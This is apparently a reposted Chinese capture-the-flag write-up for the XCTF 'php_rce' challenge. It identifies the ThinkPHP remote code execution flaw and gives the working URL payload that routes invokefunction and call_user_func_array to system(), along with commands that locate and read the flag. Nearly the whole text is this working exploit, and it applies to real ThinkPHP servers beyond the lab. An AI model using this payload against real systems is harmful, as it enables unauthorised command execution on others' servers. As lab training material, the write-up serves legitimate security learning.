XCTF-高手进阶区:php_rce

题目:
在这里插入图片描述
看到题目就知道是thinkphp的远程执行漏洞
payload:
index.php默认的话可以不需要

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码

注:代码后面可不加分号
获得flag:

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
发布了135 篇原创文章 · 获赞 51 · 访问量 5万+

猜你喜欢

转载自blog.csdn.net/qq_41617034/article/details/104606700